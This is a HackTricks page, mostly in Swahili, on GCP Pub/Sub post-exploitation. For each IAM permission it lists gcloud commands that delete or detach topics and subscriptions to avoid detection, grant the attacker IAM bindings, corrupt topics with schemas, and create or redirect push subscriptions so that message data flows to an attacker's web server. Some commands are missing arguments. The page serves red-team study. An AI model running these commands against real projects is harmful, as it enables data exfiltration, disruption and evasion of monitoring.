GCP - Pub/Sub Post Exploitation

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

Angalia the subscription plans!

Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.

Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.

Pub/Sub

Kwa maelezo zaidi kuhusu Pub/Sub angalia ukurasa ufuatao:

GCP - Pub/Sub Enum

`pubsub.topics.publish`

Kuchapisha ujumbe kwenye topic, inafaa kwa kutuma data isiyotegemewa na kusababisha functionalities zisizotarajiwa au exploit vulnerabilities:

Chapisha ujumbe kwenye topic

```bash # Publish a message in a topic gcloud pubsub topics publish --message "Hello!" ```

`pubsub.topics.detachSubscription`

Inatumika kuzuia subscription isipokee ujumbe, labda ili kuepuka kugunduliwa.

Detach subscription from topic

```bash gcloud pubsub topics detach-subscription ```

`pubsub.topics.delete`

Inafaa kuzuia subscription kupokea messages, labda ili kuepuka kugunduliwa.
Inawezekana kufuta topic hata ikiwa subscriptions zimeambatishwa nayo.

Delete topic

```bash gcloud pubsub topics delete ```

Tumia ruhusa hii kubadilisha baadhi ya mipangilio ya topic ili kuisumbua, kama --clear-schema-settings, --message-retention-duration, --message-storage-policy-allowed-regions, --schema, --schema-project, --topic-encryption-key…

`pubsub.topics.setIamPolicy`

Jipe ruhusa kufanya yoyote ya mashambulizi yaliyotajwa hapo juu.

# Add Binding
gcloud pubsub topics add-iam-policy-binding <TOPIC_NAME> \
--member="serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com" \
--role="<ROLE_OR_CUSTOM_ROLE>" \
--project="<PROJECT_ID>"

# Remove Binding
gcloud pubsub topics remove-iam-policy-binding <TOPIC_NAME> \
--member="serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com" \
--role="<ROLE_OR_CUSTOM_ROLE>" \
--project="<PROJECT_ID>"

# Change Policy
gcloud pubsub topics set-iam-policy <TOPIC_NAME> \
<(echo '{
"bindings": [
{
"role": "<ROLE_OR_CUSTOM_ROLE>",
"members": [
"serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com"
]
}
]
}') \
--project=<PROJECT_ID>

`pubsub.subscriptions.create,``pubsub.topics.attachSubscription` , (`pubsub.subscriptions.consume`)

Pata ujumbe yote kwenye web server:

Unda push subscription ili kupokea ujumbe

```bash # Crete push subscription and recieve all the messages instantly in your web server gcloud pubsub subscriptions create --topic --push-endpoint https:// ```

Tengeneza subscription na uitumie pull messages:

Tengeneza pull subscription na upokee messages

```bash # This will retrive a non ACKed message (and won't ACK it) gcloud pubsub subscriptions create --topic

You also need pubsub.subscriptions.consume for this

gcloud pubsub subscriptions pull

This command will wait for a message to be posted

</details>

### `pubsub.subscriptions.delete`

**Futa usajili** inaweza kuwa muhimu kusababisha matatizo kwa mfumo wa usindikaji wa logi au kitu kinachofanana:

<details>

<summary>Futa usajili</summary>
```bash
gcloud pubsub subscriptions delete <FULL SUBSCRIPTION NAME>

`pubsub.subscriptions.update`

Tumia ruhusa hii kusasisha baadhi ya mipangilio ili ujumbe uhifadhiwe mahali unaweza kufikia (URL, Big Query table, Bucket) au tu kuuvuruga.

Mwisho wa kusasisha subscription

```bash gcloud pubsub subscriptions update --push-endpoint

```

`pubsub.subscriptions.setIamPolicy`

Jipa ruhusa zinazohitajika ili kutekeleza mojawapo ya mashambulizi yaliyotajwa hapo awali.

`pubsub.schemas.attach`, `pubsub.topics.update`,(`pubsub.schemas.create`)

Ambatisha schema kwenye topic ili ujumbe usiukidhi, na hivyo kusababisha topic kuvurugika.
Kama hakuna schema yoyote unaweza kuhitajika kuunda moja.

Unda faili ya schema na uiambatishe kwenye topic

```json:schema.json { "namespace": "com.example", "type": "record", "name": "Person", "fields": [ { "name": "name", "type": "string" }, { "name": "age", "type": "int" } ] } ```

# Attach new schema
gcloud pubsub topics update projects/<project-name>/topics/<topic-id> \
--schema=projects/<project-name>/schemas/<topic-id> \
--message-encoding=json

`pubsub.schemas.delete`

Hii inaweza kuonekana kama kuondoa schema ili uweze kutuma ujumbe ambao hautatii schema. Hata hivyo, kwa kuwa schema itafutwa, ujumbe wowote hautaingia ndani ya topic. Kwa hivyo hii ni HAINA FAIDA:

Futa schema (hainufaiki)

```bash gcloud pubsub schemas delete ```

`pubsub.schemas.setIamPolicy`

Jipa ruhusa zinazohitajika ili kutekeleza yoyote ya mashambulizi yaliyotajwa hapo awali.

`pubsub.snapshots.create`, `pubsub.snapshots.seek`

Hii itaunda snapshot ya ujumbe wote ambao haujathibitishwa (unACKed) na kuwarudisha kwenye subscription. Si muhimu sana kwa mshambuliaji lakini hapa iko:

Tengeneza snapshot na ufanye seek

```bash gcloud pubsub snapshots create YOUR_SNAPSHOT_NAME \ --subscription=YOUR_SUBSCRIPTION_NAME gcloud pubsub subscriptions seek YOUR_SUBSCRIPTION_NAME \ --snapshot=YOUR_SNAPSHOT_NAME ```

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

Angalia the subscription plans!

Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.

Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.